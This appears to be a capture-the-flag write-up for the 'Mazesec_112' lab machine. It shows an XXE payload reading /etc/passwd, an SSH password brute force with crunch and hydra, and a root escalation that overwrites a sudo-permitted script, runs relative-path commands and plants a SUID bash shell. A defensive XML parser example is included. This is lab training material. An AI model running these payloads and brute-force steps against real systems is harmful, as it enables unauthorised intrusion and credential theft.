Mazesec_112

Target source: QQ group 660930334

Difficulty: Easy

I. Information Gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-16 12:28 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00052s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00043s latency).
MAC Address: 08:00:27:1B:FF:4E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.49
Host is up (0.00052s latency).
MAC Address: 08:00:27:53:8C:29 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 4.12 seconds

Target IP: 192.168.2.49

2. Port scanning

(1) Full TCP port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.49
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-16 12:28 +0800
Nmap scan report for 192.168.2.49
Host is up (0.00057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:53:8C:29 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.12 seconds

Open ports: 22, 80

(2) Service and version scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.49
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-16 12:29 +0800
Nmap scan report for 192.168.2.49
Host is up (0.00088s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: XML Parser
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:53:8C:29 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.72 seconds

(3) UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.49
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-16 12:30 +0800
Nmap scan report for 192.168.2.49
Host is up (0.00091s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:53:8C:29 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 106.06 seconds

II. Web Penetration

1. Website on port 80

Visiting port 80 reveals an XML-parsing feature.

2. XXE vulnerability

If the XML parser has external entities enabled, it can be abused. We try to read /etc/passwd:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>


The response reveals the user tuf and the password KQNPHFqG**JHcYJossIe.
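As a defensive counterpart to the payload above, the following is an added example (not part of the original write-up) of how the server-side parser could have refused this document: using Python's standard-library expat bindings, it aborts on any DOCTYPE, entity declaration or external entity reference before content is parsed. The payload and benign document are constructed samples, and the function names are my own.

```python
import xml.parsers.expat as expat

# Constructed sample: the same XXE document the write-up submits to the page.
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>"""

# Constructed sample: what a legitimate client of the parser would send.
BENIGN_DOC = b'<?xml version="1.0"?><foo><bar>hello</bar></foo>'


class XmlSecurityError(ValueError):
    """Raised when untrusted XML uses a DTD/entity feature we do not allow."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an untrusted source; any DTD or entity use aborts parsing.

    Returns {"elements": [tag names in document order], "text": [text chunks]}.
    """
    parser = expat.ParserCreate()
    result = {"elements": [], "text": []}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # The DOCTYPE is where <!ENTITY ... SYSTEM "file:///..."> lives; refuse it
        # outright rather than trying to whitelist "harmless" declarations.
        raise XmlSecurityError(f"DOCTYPE not allowed (root element {name!r})")

    def on_entity_decl(name, *_):
        raise XmlSecurityError(f"entity declaration not allowed: {name!r}")

    def on_external_ref(context, base, sysid, pubid):
        raise XmlSecurityError(f"external entity not allowed: {sysid!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl          # belt and braces
    parser.ExternalEntityRefHandler = on_external_ref  # never fetch file:// or http://
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = lambda name, attrs: result["elements"].append(name)
    parser.CharacterDataHandler = lambda text: result["text"].append(text)
    parser.Parse(data, True)
    return result


def rejection_reason(data: bytes) -> str:
    """Return '' if the document parses safely, otherwise why it was refused."""
    try:
        parse_untrusted_xml(data)
        return ""
    except XmlSecurityError as exc:
        return str(exc)
    except expat.ExpatError as exc:
        return f"malformed XML: {exc}"
```

On the vulnerable target the same request returned the contents of /etc/passwd; with this parser the request is refused at the DOCTYPE and the file is never opened.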

III. SSH Password Brute Force

Two characters of user tuf's password are unknown, so we try brute forcing them with hydra.

  1. First generate a wordlist with crunch
┌──(root㉿kali)-[~/miaosec]
└─# crunch 2 2 -f /usr/share/crunch/charset.lst alpha-numeric | \
awk '{print "KQNPHFqG" $0 "JHcYJossIe"}' > tuf_passwords.txt
Crunch will now generate the following amount of data: 11532 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 3844
  2. Brute force with hydra
┌──(root㉿kali)-[~/miaosec]
└─# hydra -l tuf -P ./pass.txt -s 22 ssh://192.168.2.49 -t 4 -v -I -e nsr
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-16 12:50:05
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 3847 login tries (l:1/p:3847), ~962 tries per task
[DATA] attacking ssh://192.168.2.49:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://tuf@192.168.2.49:22
[INFO] Successful, password authentication is supported by ssh://192.168.2.49:22
[STATUS] 73.00 tries/min, 73 tries in 00:01h, 3774 to do in 00:52h, 4 active
[STATUS] 71.00 tries/min, 213 tries in 00:03h, 3634 to do in 00:52h, 4 active
[22][ssh] host: 192.168.2.49 login: tuf password: KQNPHFqG6mJHcYJossIe
[STATUS] attack finished for 192.168.2.49 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-16 12:53:32

Successfully recovered user tuf's password: KQNPHFqG6mJHcYJossIe

IV. Getting a Shell as tuf

Log in with the credentials tuf:KQNPHFqG6mJHcYJossIe

┌──(root㉿kali)-[~/miaosec]
└─# ssh tuf@192.168.2.49
...
tuf@112:~$ id
uid=1000(tuf) gid=1000(tuf) groups=1000(tuf)

V. Privilege Escalation

Check sudo -l

tuf@112:~$ sudo -l
Matching Defaults entries for tuf on 112:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tuf may run the following commands on 112:
(ALL) NOPASSWD: /opt/112.sh

Inspect /opt/112.sh

#!/bin/bash
input_url=""
output_file=""
use_file=false
regex='^https://maze-sec.com/[a-zA-Z0-9/]*$'
while getopts ":u:o:" opt; do
    case ${opt} in
        u) input_url="$OPTARG" ;;
        o) output_file="$OPTARG"; use_file=true ;;
        \?) echo "错误: 无效选项 -$OPTARG"; exit 1 ;;
        :) echo "错误: 选项 -$OPTARG 需要一个参数"; exit 1 ;;
    esac
done
if [[ -z "$input_url" ]]; then
    echo "错误: 必须使用 -u 参数提供URL"
    exit 1
fi
if [[ ! "$input_url" =~ ^https://maze-sec.com/ ]]; then
    echo "错误: URL必须以 https://maze-sec.com/ 开头"
    exit 1
fi
if [[ ! "$input_url" =~ $regex ]]; then
    echo "错误: URL包含非法字符,只允许字母、数字和斜杠"
    exit 1
fi
if (( RANDOM % 2 )); then
    result="$input_url is a good url."
else
    result="$input_url is not a good url."
fi
if [ "$use_file" = true ]; then
    echo "$result" > "$output_file"
    echo "结果已保存到: $output_file"
else
    echo "$result"
fi

What the script does: it accepts a URL via -u, checks that the URL meets its requirements, then prints a random verdict; if -o is given, the verdict is written to that file instead. The URL part of the output is attacker-controlled and the output path is unrestricted, so running it under sudo gives an arbitrary file overwrite as root.

tao's approach

[Prerequisite knowledge]

  • 1. In a Unix path, multiple consecutive / are equivalent to a single /; for example, /opt//112.sh is equivalent to /opt/112.sh.
  • 2. On Linux, directory and file names may contain almost any character (except / and NUL), including spaces, tabs, newlines and other special characters.
  • 3. When sudo or a shell tries to execute an executable text file that has no shebang, the underlying execve returns ENOEXEC, and the caller usually falls back to interpreting the file with /bin/sh (or its configured shell).

[Path resolution abuse] If a command name contains a /, the shell treats it as a path (absolute or relative) and executes it directly without searching $PATH; a relative path is resolved against the current working directory.

Core idea: the script's -o parameter lets us write the validation result (e.g. https://maze-sec.com/111 is a good url.) to any file.

  1. If we use this behaviour to overwrite the script itself (/opt/112.sh) with the result, the old script content (including #!/bin/bash) is lost.
  2. When we run the script with sudo again, the first line the shell reads is now a string beginning with https://.
  3. Because that string contains /, the shell treats it as a relative-path command: it looks for an executable named 111 inside a maze-sec.com directory inside an https: directory under the current working directory.
  4. As long as we create that directory structure in the current directory beforehand and place our own file there, we get command execution as root.

Test

tuf@112:/tmp$ echo 'https://maze-sec.com/111 is good url.' > test.sh
tuf@112:/tmp$ chmod +x test.sh
tuf@112:/tmp$ ./test.sh
./test.sh: line 1: https://maze-sec.com/111: No such file or directory

tuf@112:/tmp$ mkdir -p 'https://maze-sec.com'
tuf@112:/tmp$ echo "whoami" > https:/maze-sec.com/111
tuf@112:/tmp$ chmod +x https:/maze-sec.com/111
tuf@112:/tmp$ ./test.sh
tuf

The https://maze-sec.com/111 script was executed and printed the user name tuf.

If the output https://maze-sec.com/111 is a good url. overwrites the /opt/112.sh script and the script is then run with sudo, arbitrary command execution follows from changing the contents of the 111 file.

tuf@112:/tmp$ sudo /opt/112.sh -o /opt/112.sh -u https://maze-sec.com/111
/etc/sudoers.d/tuf:1:6: syntax error
https://maze-sec.com/ is not a good url.
^
root
tuf@112:/tmp$ cat /opt/112.sh
https://maze-sec.com/111 is not a good url.

tuf@112:/tmp$ sudo /opt/112.sh
/etc/sudoers.d/tuf:1:6: syntax error
https://maze-sec.com/ is not a good url.
^
root

tuf@112:/tmp$ echo 'cp /bin/bash /tmp/bash;chmod +s /tmp/bash' > https:/maze-sec.com/111

tuf@112:/tmp$ sudo /opt/112.sh
/etc/sudoers.d/tuf:1:6: syntax error
https://maze-sec.com/ is not a good url.
^

tuf@112:/tmp$ ls -la /tmp/bash
-rwsr-sr-x 1 root root 1168776 Jan 19 04:31 /tmp/bash

tuf@112:/tmp$ /tmp/bash -p
bash-5.0# id
uid=1000(tuf) gid=1000(tuf) euid=0(root) egid=0(root) groups=0(root),1000(tuf)

VI. Reading the Flags

bash-5.0# cat /root/root.txt /home/tuf/user.txt 
flag{root-538dc127225a0c97b060b1ff9570390a}
flag{user-b1e12c74f19aac8e57f6fca1ff472905}

Mazesec_112
http://miao-sec.github.io/Maze-sec/Mazesec-112/
Author
Miao
Published
January 16, 2026
License
BY-MIAO